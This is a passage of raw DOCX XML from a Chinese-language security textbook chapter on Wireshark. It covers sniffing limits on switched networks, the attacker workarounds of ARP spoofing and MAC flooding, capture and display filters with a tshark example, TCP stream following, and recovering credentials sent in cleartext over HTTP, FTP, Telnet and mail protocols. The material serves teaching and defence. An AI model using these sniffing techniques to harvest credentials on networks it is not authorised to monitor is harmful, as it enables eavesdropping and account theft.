        <w:t xml:space="preserve">，使其将所有接收到的帧（无论目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MAC）全部交给操作系统协议栈。Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">借助</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">libpcap（Unix/Linux）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WinPcap/Npcap（Windows）抓取这些帧，并以图形化方式展示。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">然而，现代交换式以太网环境中，交换机根据</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址表进行端口转发，默认不会将发往其他端口的单播帧复制到嗅探端口。因此，仅靠混杂模式在交换机上只能看到发往本机的帧、广播帧和多播帧，看不到同一交换机上其他主机之间的单播通信。这就是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">嗅探可见性受限</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的根本原因。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">要突破这一限制，攻击者通常需要采用以下手段之一：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 6.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节）使流量绕经攻击机；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">端口镜像（SPAN）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或网络</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TAP，但这些通常需要网络设备管理权限；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">泛洪</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（使得交换机进入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hub-like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">失败开放模式，但现代交换机基本已防御）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">因此，在完全没有这些附加手段的交换网络中，Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">只能看到一个“角落里的世界”——这也正是防御者可以加以利用之处：如果某个端口突然收到大量不属于该主机的单播帧，可能就意味着混杂模式或中间人攻击的存在。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">正文：Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">核心分析能力</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">抓包与捕获过滤器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">启动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后，首先需要选择监听的网络接口。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上通常为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">eth0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ens33</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等；在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等渗透测试系统中，需注意无线网卡接口（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">wlan0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）以及可能需要先启用监听模式（monitor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mode）以嗅探</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 802.11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">帧，这部分已超出本节有线以太网范围，但思想相同。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提供两类过滤器：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">捕获过滤器（capture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">filter）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在抓包时即使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BPF（Berkeley</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Packet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter）语法进行硬件/内核级过滤，减少不必要的包进入捕获缓冲。例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">host 192.168.1.100 and tcp port 80</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">只抓取与特定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和端口的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包。这有助于在高速网络中减少丢包与存储压力。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">显示过滤器（display</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">filter）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：已捕获数据包的后期筛选，不影响抓包内容，只是视图过滤。语法更丰富，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http.request.method == "POST"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可以筛选出所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">命令示例（tshark）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 在 eth0 接口上抓包，仅捕获去往 &lt;TARGET_IP&gt; 的流量，并实时显示</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> eth0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"host &lt;TARGET_IP&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（实际</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">因环境而异</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">跟踪</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">流</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最强大的功能之一是将属于同一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接的包重组为有序的数据流。选择任意一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包，右键</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → Follow → TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Stream，即可看到应用层数据的完整对话（使用该连接进行的所有发送和接收内容）。这对于分析明文协议中的凭据、理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信标行为至关重要。在跟踪流时，Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自动处理乱序和重传，呈现出像</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">telnet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话一样的文本视图。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理基础</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提供有序字节流，Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用序列号和确认号重组双向流，这部分完全依赖《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 27 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章所述的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态机与序号机制，此处不重讲。值得一提的是，若流中的数据经过加密（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TLS），跟踪流视图只能显示密文，无法直接解读。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">识别明文协议凭据泄露（协议事实</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">①）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">许多经典应用层协议在设计中未考虑窃听威胁，凭据和数据以明文形式传输。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，这些凭据对任何能捕获数据包的人立即可见。典型的明文协议包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（基础认证或表单</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">未加密）：虽然</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本身没有内置加密，但网站登录表单的数据会以明文形式在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求体中传输。如果攻击者捕获到包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization: Basic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头的请求，Base64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解码即可得到用户名和密码（Base64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不是加密，只是编码）。表单数据也可能通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">application/x-www-form-urlencoded</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">传输，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">追踪</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流时一眼可见。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">FTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：控制连接（端口</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">21）以明文传输</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">USER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PASS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令，数据连接同样明文。跟踪</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流就像看屏幕记录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：每个字符均明文传输，包括登录过程中的用户名和密码。跟踪流即可还原整个会话。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">POP3 / IMAP / SMTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（未启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> STARTTLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSL/TLS </w:t>
